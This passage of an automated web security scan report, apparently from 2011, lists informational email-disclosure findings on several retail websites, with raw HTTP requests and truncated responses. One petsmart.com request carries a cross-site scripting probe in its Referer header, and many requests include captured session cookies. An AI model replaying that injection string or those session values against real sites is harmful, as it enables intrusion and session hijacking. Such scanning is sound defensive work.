* code@andresvidal.com
* http://www.andresvidal.com/labs
*
* @arg url(mixed) The popup url or object containing an href. Example: Use object [this] or string 'http://www.google.com'
* @arg name(stri
...[SNIP]...

20.24. http://www.bhphotovideo.com/FrameWork/js/jquery/jquery.placeHolder.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bhphotovideo.com
Path:	/FrameWork/js/jquery/jquery.placeHolder.js

Issue detail

The following email address was disclosed in the response:

code@andresvidal.com

Request

GET /FrameWork/js/jquery/jquery.placeHolder.js HTTP/1.1
Host: www.bhphotovideo.com
Proxy-Connection: keep-alive
Referer: http://www.bhphotovideo.com/find/cart.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookieID=18154535221305509932941; cmTPSet=Y; JSESSIONID=pfTcNQ5SFQ!-112699937; TS29f0cc=862fc783847fff78c55a7f1651d84fbf871d7ea6dc67d58e4dd0f99460ac0ec569178bf8b092ce85bc587bdd; cmRS=&t1=1305541033888&t2=1305541035139&t3=1305541039955&t4=1305541030076&lti=1305541038716&ln=&hr=/find/cart.jsp&fti=1305541039955&fn=searchForm%3A0%3BNwsLtrSgnUp_Subscribe%3A1%3B&ac=-1:U&fd=0%3A0%3A%3B&uer=&fu=&pi=underwater-equipment.jsp&ho=server.bhphotovideo.com/cm%3F&ci=90132819

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 28 Feb 2011 04:00:18 GMT
ETag: "852-4d6b1dd2"
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: public, max-age=7200
Date: Mon, 16 May 2011 10:17:25 GMT
Connection: close
Content-Length: 2130

/**
* jQuery-Plugin "Placeholder"
*
* @version: 1.1.0, 01.19.2011
*
* @author: Andres Vidal
* code@andresvidal.com
* http://www.andresvidal.com
*
* Instructions: Call $(selector).placeholder(options) on an input element with an attribute placeholder.
* @example: $('input#search').placeholder(); // <in
...[SNIP]...

20.25. http://www.bhphotovideo.com/FrameWork/js/jquery/jquery.styledDropdown.min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bhphotovideo.com
Path:	/FrameWork/js/jquery/jquery.styledDropdown.min.js

Issue detail

The following email address was disclosed in the response:

code@andresvidal.com

Request

GET /FrameWork/js/jquery/jquery.styledDropdown.min.js?v=05152011 HTTP/1.1
Host: www.bhphotovideo.com
Proxy-Connection: keep-alive
Referer: http://www.bhphotovideo.com/find/cart.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookieID=18154535221305509932941; cmTPSet=Y; JSESSIONID=pfTcNQ5SFQ!-112699937; TS29f0cc=862fc783847fff78c55a7f1651d84fbf871d7ea6dc67d58e4dd0f99460ac0ec569178bf8b092ce85bc587bdd; cmRS=&t1=1305541033888&t2=1305541035139&t3=1305541039955&t4=1305541030076&lti=1305541038716&ln=&hr=/find/cart.jsp&fti=1305541039955&fn=searchForm%3A0%3BNwsLtrSgnUp_Subscribe%3A1%3B&ac=-1:U&fd=0%3A0%3A%3B&uer=&fu=&pi=underwater-equipment.jsp&ho=server.bhphotovideo.com/cm%3F&ci=90132819

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 19 Apr 2010 03:00:13 GMT
ETag: "f26-4bcbc73d"
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: public, max-age=7200
Date: Mon, 16 May 2011 10:17:24 GMT
Connection: close
Content-Length: 3878

/**
* Styled Dropdown - jQuery Plugin v0.1.0
* Easily converts SELECT elements to eventful and styleable DL, DT, DD elements.
* Requires jQuery 1.3.x
*
* Copyright 2010, Andres Vidal (code@andresvidal.com)
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://www.andresvidal.com/license/styledDropdown
*
* Instructions: Call $(selector).styledDropdown(options) on an element with a jQuery
...[SNIP]...

20.26. http://www.bluenile.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bluenile.com
Path:	/

Issue detail

The following email address was disclosed in the response:

service@bluenile.com

Request

Response

20.27. http://www.bluenile.com/build-your-own-diamond-ring previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bluenile.com
Path:	/build-your-own-diamond-ring

Issue detail

The following email address was disclosed in the response:

service@bluenile.com

Request

Response

20.28. http://www.bluenile.com/engagement-rings previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bluenile.com
Path:	/engagement-rings

Issue detail

The following email address was disclosed in the response:

service@bluenile.com

Request

Response

20.29. http://www.brookstone.com/protoculous_102.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.brookstone.com
Path:	/protoculous_102.js

Issue detail

The following email addresses were disclosed in the response:

sammi@oriontransfer.co.nz
tdd@tddsworld.com

Request

GET /protoculous_102.js HTTP/1.1
Host: www.brookstone.com
Proxy-Connection: keep-alive
Referer: http://www.brookstone.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=CD578D91A4C7B4E1296267339AF6F2A2; TS657dfa=839bad1e649fb9545c4c97dd9c18439ee754034066e5db8e4dd083f960ac0ec57d901b7a

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
X-Accelerator-Vary: Accept-Encoding
Cache-Control: public, max-age=259200
Expires: Thu, 19 May 2011 01:29:05 GMT
ETag: W/"258912-1280871734000"
Last-Modified: Tue, 03 Aug 2010 21:42:14 GMT
Content-Type: text/javascript
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:29:04 GMT
Age: 1563
X-Cache: HIT from cache.brookstone.com
X-Cache-Lookup: HIT from cache.brookstone.com:3128
Connection: close

/* Prototype JavaScript framework, version 1.6.0.3
* (c) 2005-2008 Sam Stephenson
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see the Prot
...[SNIP]...
8.2, Tue Nov 18 18:30:58 +0100 2008

// Copyright (c) 2005-2008 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2008 Sammi Williams (http://www.oriontransfer.co.nz, sammi@oriontransfer.co.nz)
//
// script.aculo.us is freely distributable under the terms of an MIT-style license.
// For details, see the script.aculo.us web site: http://script.aculo.us/

if(Object.isUndefined(Effect))

...[SNIP]...
<tdd@tddsworld.com>
...[SNIP]...

20.30. https://www.brookstone.com/protoculous_102.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.brookstone.com
Path:	/protoculous_102.js

Issue detail

The following email addresses were disclosed in the response:

sammi@oriontransfer.co.nz
tdd@tddsworld.com

Request

GET /protoculous_102.js HTTP/1.1
Host: www.brookstone.com
Connection: keep-alive
Referer: https://www.brookstone.com/formhandlerservlet?currentNodeLink=/shoppingCart.jsp&formName=updateCart_checkout
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]; JSESSIONID=B4E0235D8822C4DE7BE6C831C54E4E62; TS657dfa=f5d54e710c8ae3d5dcd77d6f57bcade2e754034066e5db8e4dd0fb6760ac0ec56e0e0800; s_pers=%20s_nr%3D1305511115723%7C1368583115723%3B%20s_lv%3D1305511115727%7C1400119115727%3B%20s_lv_s%3DFirst%2520Visit%7C1305512915727%3B%20s_vs%3D1%7C1305543312191%3B; s_sess=%20s_evar2%3Dsubcategorylandingpage_home_beanbag_chairs_kids%257Cc1topproducts1fdt%257C11370241%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
X-Accelerator-Vary: Accept-Encoding
Cache-Control: public, max-age=259200
Expires: Thu, 19 May 2011 10:04:41 GMT
ETag: W/"258912-1280871734000"
Last-Modified: Tue, 03 Aug 2010 21:42:14 GMT
Content-Type: text/javascript
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:04:40 GMT
Age: 1239
X-Cache: HIT from cache.brookstone.com
X-Cache-Lookup: HIT from cache.brookstone.com:3128
Connection: close

/* Prototype JavaScript framework, version 1.6.0.3
* (c) 2005-2008 Sam Stephenson
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see the Prot
...[SNIP]...
8.2, Tue Nov 18 18:30:58 +0100 2008

// Copyright (c) 2005-2008 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2008 Sammi Williams (http://www.oriontransfer.co.nz, sammi@oriontransfer.co.nz)
//
// script.aculo.us is freely distributable under the terms of an MIT-style license.
// For details, see the script.aculo.us web site: http://script.aculo.us/

if(Object.isUndefined(Effect))

...[SNIP]...
<tdd@tddsworld.com>
...[SNIP]...

20.31. http://www.ftd.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ftd.com
Path:	/

Issue detail

The following email address was disclosed in the response:

autorenew@ftdi.com

Request

Response

20.32. http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ftd.com
Path:	/sweet-shop-ctg/product-sweet-shop/

Issue detail

The following email address was disclosed in the response:

autorenew@ftdi.com

Request

Response

20.33. https://www.gnc.com/common/checkout/js/jsu-1.0.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.gnc.com
Path:	/common/checkout/js/jsu-1.0.js

Issue detail

The following email address was disclosed in the response:

me@bradhurley.com

Request

GET /common/checkout/js/jsu-1.0.js HTTP/1.1
Host: www.gnc.com
Connection: keep-alive
Referer: https://www.gnc.com/checkout/index.jsp?process=orderTrackingLogin
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=2SCdNQBJtc6fnMp5nXRqNrr7VfPTcdnTdWsT6PPzqzhjv122c27G!1431589390; browser_id=125602265854; __g_c=w%3A0; s_vi=[CS]v1|26E8409C850133EE-60000105E041F1EF[CE]; recommendationUid=801458892474636324; __utmz=1.1305510217.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.1817838745.1305510198897; PrefID=41-1015464695; __utma=1.718486850.1305510217.1305510217.1305510217.1; __utmc=1; __utmb=1.2.10.1305510217; s_pers=%20s_lastvisit%3D1305510199866%7C1400118199866%3B%20s_nr%3D1305511419003%7C1308103419003%3B%20gpv_p6%3DHome%2520Page%7C1305513219009%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicgncf%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.gnc.com/coreg/index.jsp%2525253Fstep%2525253Dot%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:03:59 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Fri, 15 Oct 2010 07:09:00 GMT
ETag: "147003d-62c0-492a280329b00"
Accept-Ranges: bytes
Cache-Control: max-age=21600
Expires: Mon, 16 May 2011 08:03:59 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/x-javascript
Content-Length: 25280

/**
* @name script
*/
if(typeof(u) == 'undefined'){
/**
* the base class for the jsu library. does nothing right now
* @author Brad Hurley me@bradhurley.com
* @class
* @static
* @version 1.0.8
* @event serviceRequest {activeServiceRequests url parameters}
* @event serviceRequestComplete {activeServiceRequests url parameters}

...[SNIP]...

20.34. https://www.guitarcenter.com/includes/guitarcenter/GuitarCenter.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.guitarcenter.com
Path:	/includes/guitarcenter/GuitarCenter.css

Issue detail

The following email address was disclosed in the response:

ebhernandez@guitarcenter.com

Request

GET /includes/guitarcenter/GuitarCenter.css HTTP/1.1
Host: www.guitarcenter.com
Connection: keep-alive
Referer: https://www.guitarcenter.com/MyAccount/Login.aspx?goto=%2fMyAccount%2fDefault.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lwhsuvawhj2nga0zihmkuetv; uid=63077232-5a8c-4dcd-b23d-e9787a0b3e86; ref=; ref_d=5/15/2011 9:40:10 PM; ad_id=; orig_ref=; orig_ref_d=5/15/2011 9:40:10 PM; orig_source=4ACJWXX2; orig_ad_id=; IsLoyaltyAvailable=False; NISess=1; UnicaNIODID=XnP5ihHP0wn-W9BZAUV; CjPID=2537521; CjAID=10453836; source=4ACJWXX2; UNICASOURCE=4ACJWXX2-4ACJWXX2; UNICASOURCEL=4ACJWXX2-4ACJWXX2; mbox=session#1305510019406-714170#1305512679|PC#1305510019406-714170.17#1308102819|check#true#1305510879; s_cc=true; s_sq=mfgclive%2Cmfglobal%3D%2526pid%253Dhttp%25253A//www.guitarcenter.com/%25253FCJAID%25253D10453836%252526CJPID%25253D2537521%2526oid%253Dhttp%25253A//www.guitarcenter.com/MyAccount/Default.aspx%2526ot%253DA; fcspersisthp-slider=2

Response

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Tue, 26 Apr 2011 21:33:30 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
SN: 27
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 02:01:51 GMT
Content-Length: 45904

.../**Last edited on 7-30-2009 by Erick B. Hernandez (email: ebhernandez@guitarcenter.com)**/
/******** BEGIN CSS RESET - DO NOT MODIFY**********/
/* this resets the styles so they are the same across all browers/platforms */
body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,form,fieldse
...[SNIP]...

20.35. https://www.guitarcenter.com/includes/guitarcenter/scripts/jquery.colorbox-min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.guitarcenter.com
Path:	/includes/guitarcenter/scripts/jquery.colorbox-min.js

Issue detail

The following email address was disclosed in the response:

jack@colorpowered.com

Request

GET /includes/guitarcenter/scripts/jquery.colorbox-min.js HTTP/1.1
Host: www.guitarcenter.com
Connection: keep-alive
Referer: https://www.guitarcenter.com/MyAccount/Login.aspx?goto=%2fMyAccount%2fDefault.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lwhsuvawhj2nga0zihmkuetv; uid=63077232-5a8c-4dcd-b23d-e9787a0b3e86; ref=; ref_d=5/15/2011 9:40:10 PM; ad_id=; orig_ref=; orig_ref_d=5/15/2011 9:40:10 PM; orig_source=4ACJWXX2; orig_ad_id=; IsLoyaltyAvailable=False; NISess=1; UnicaNIODID=XnP5ihHP0wn-W9BZAUV; CjPID=2537521; CjAID=10453836; source=4ACJWXX2; UNICASOURCE=4ACJWXX2-4ACJWXX2; UNICASOURCEL=4ACJWXX2-4ACJWXX2; mbox=session#1305510019406-714170#1305512679|PC#1305510019406-714170.17#1308102819|check#true#1305510879; s_cc=true; s_sq=mfgclive%2Cmfglobal%3D%2526pid%253Dhttp%25253A//www.guitarcenter.com/%25253FCJAID%25253D10453836%252526CJPID%25253D2537521%2526oid%253Dhttp%25253A//www.guitarcenter.com/MyAccount/Default.aspx%2526ot%253DA; fcspersisthp-slider=2

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 26 Apr 2011 21:32:26 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 02:01:52 GMT
Content-Length: 9284

// ColorBox v1.3.16 - a full featured, light-weight, customizable lightbox based on jQuery 1.3+
// Copyright (c) 2011 Jack Moore - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
(function(a,b,c){function ba(b){if(!T){O=b,Z(a.extend(J,a.data(O,e))),x=a(O),P=0,J.rel!=="nofollow"&&(x=a("."+V)
...[SNIP]...

20.36. https://www.helzberg.com/includes/jquery/plugins/jquery.hoverIntent.minified.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.helzberg.com
Path:	/includes/jquery/plugins/jquery.hoverIntent.minified.js

Issue detail

The following email address was disclosed in the response:

brian@cherne.net

Request

GET /includes/jquery/plugins/jquery.hoverIntent.minified.js HTTP/1.1
Host: www.helzberg.com
Connection: keep-alive
Referer: https://www.helzberg.com/account/login.do?method=view
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=140079658.898159482.1305510047.1305510047.1305510047.1; __utmc=140079658; __utmz=140079658.1305510047.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_cc=true; s_sq=mlhelzbprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.helzberg.com/account.do%25253Fmethod%25253Dstart%2526ot%253DA; JSESSIONID=868be428ae9850771218182add6d.helzberg-b2c-i4; customer=none; basket=none; fsr.s={"v":1,"rid":"1305510061756_802948","pv":3,"to":5,"c":"http://www.helzberg.com/","lc":{"d0":{"v":3,"s":false}},"cd":0,"sd":0,"f":1305542711019}; fsr.a=1305542721305

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 09 May 2011 16:45:27 GMT
ETag: "649-910d97c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: application/javascript
Cache-Control: max-age=7200
Date: Mon, 16 May 2011 10:45:28 GMT
Connection: keep-alive
Content-Length: 1609

.../**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @par
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

20.37. http://www.petsmart.com/js/LIB_core.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.petsmart.com
Path:	/js/LIB_core.js

Issue detail

The following email address was disclosed in the response:

sam@conio.net

Request

GET /js/LIB_core.js HTTP/1.1
Host: www.petsmart.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/?5f832--%3E%3Cscript%3Ealert(1)%3C/script%3E3105c4c3d6e=1
Cookie: __g_c=w%3A0

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:49:53 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 08 Nov 2006 21:00:01 GMT
ETag: "53cb54-aa04-421c29a2f3640"
Accept-Ranges: bytes
Cache-Control: max-age=21600
Expires: Mon, 16 May 2011 16:49:53 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/x-javascript
Content-Length: 43524

/* Prototype JavaScript framework, version 1.4.0
* (c) 2005 Sam Stephenson <sam@conio.net>
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see
...[SNIP]...

20.38. https://www.petsmart.com/checkout/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.petsmart.com
Path:	/checkout/index.jsp

Issue detail

The following email address was disclosed in the response:

joe@aol.com

Request

Response

20.39. https://www.petsmart.com/js/LIB_core.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.petsmart.com
Path:	/js/LIB_core.js

Issue detail

The following email address was disclosed in the response:

sam@conio.net

Request

GET /js/LIB_core.js HTTP/1.1
Host: www.petsmart.com
Connection: keep-alive
Referer: https://www.petsmart.com/checkout/index.jsp?process=login
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=125602041944; __g_u=321577027175173_1_1_0_5_1305941958166_1; s_vi=[CS]v1|26E8402A85161A9C-600001A4C022CD09[CE]; JSESSIONID=pwQQNQ5J8sGGv1ZyxKxDm9ZG65sn32cydSWyh9Wys8R43WxTXXlg!-2104235570; __utmz=113636102.1305541077.2.2.utmcsr=petsmart.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=113636102.773639997.1305509971.1305509971.1305541077.2; __utmc=113636102; __utmb=113636102.1.10.1305541077; mr_referredVisitor=0; mt.v=1.1365981912.1305509972396; s_pers=%20s_nr%3D1305510791638%7C1308102791638%3B%20s_lastvisit%3D1305541061450%7C1400149061450%3B%20gpv_p27%3DHome%2520Page%7C1305542879295%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicpet%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.petsmart.com/coreg/index.jsp%2525253Fstep%2525253Dregister%252526ot%25253DA%3B; __g_c=w%3A1%7Cb%3A4%7Cr%3Ahttp%24*%24//www.petsmart.com/%3Frdir%3D1A_2___1305541079307%7Cc%3A321577027175173%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cg%3A1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:18:08 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 08 Nov 2006 21:00:01 GMT
ETag: "53cb54-aa04-421c29a2f3640"
Accept-Ranges: bytes
Cache-Control: max-age=21600
Expires: Mon, 16 May 2011 16:18:08 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/x-javascript
Content-Length: 43524

/* Prototype JavaScript framework, version 1.4.0
* (c) 2005 Sam Stephenson <sam@conio.net>
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see
...[SNIP]...

20.40. https://www.restorationhardware.com/assets/js/jquery/plugins/jquery.cookie.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.restorationhardware.com
Path:	/assets/js/jquery/plugins/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

klaus.hartl@stilbuero.de

Request

GET /assets/js/jquery/plugins/jquery.cookie.js HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: https://www.restorationhardware.com/my-account/sign-in.jsp?link=topnav_signin
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; fsr.s={"v":1,"rid":"1305509997099_983249","pv":2,"to":5,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511158757}; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.3.10.1305509985; engagement=3; fsr.a=1305511172437

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 18 Nov 2010 19:37:06 GMT
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 01:59:41 GMT
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Sun, 15 May 2011 12:23:28 GMT
Content-Length: 4246

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

20.41. https://www.restorationhardware.com/assets/js/jquery/plugins/jquery.pngFix.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.restorationhardware.com
Path:	/assets/js/jquery/plugins/jquery.pngFix.js

Issue detail

The following email addresses were disclosed in the response:

andreas.eberhard@gmail.com
scott@filamentgroup.com

Request

GET /assets/js/jquery/plugins/jquery.pngFix.js HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: https://www.restorationhardware.com/my-account/sign-in.jsp?link=topnav_signin
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; fsr.s={"v":1,"rid":"1305509997099_983249","pv":2,"to":5,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511158757}; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.3.10.1305509985; engagement=3; fsr.a=1305511172437

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 18 Nov 2010 19:37:06 GMT
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 01:59:39 GMT
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Sun, 15 May 2011 12:23:28 GMT
Content-Length: 4795

/**
* --------------------------------------------------------------------
* jQuery-Plugin "pngFix"
* Version: 1.2, 09.03.2009
* by Andreas Eberhard, andreas.eberhard@gmail.com
* http://jquery.andreaseberhard.de/
*
* Copyright (c) 2007 Andreas Eberhard
* Licensed under GPL (http://www.opensource.org/licenses/gpl-license.php)
*
* Changelog:

...[SNIP]...
from selectors
* 11.09.2007 Version 1.1
* - removed noConflict
* - added png-support for input type=image
* - 01.08.2007 CSS background-image support extension added by Scott Jehl, scott@filamentgroup.com, http://www.filamentgroup.com
* 31.05.2007 initial Version 1.0
* --------------------------------------------------------------------
* @example $(function(){$(document).pngFix();});
* @des
...[SNIP]...

20.42. http://www.travelguard.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.travelguard.com
Path:	/

Issue detail

The following email addresses were disclosed in the response:

WebException@travelguard.com
webmaster@travelguard.com

Request

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 114210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><script id="EktronJS" ty
...[SNIP]...
.ca";
globalConfiguration.GLOBAL_Domain_TGBUY = "http://buy.travelguard.com";
globalConfiguration.GLOBAL_Domain_TGBUYSecure = "https://buy.travelguard.com";
globalConfiguration.GLOBAL_ErrorEmail = "WebException@travelguard.com";
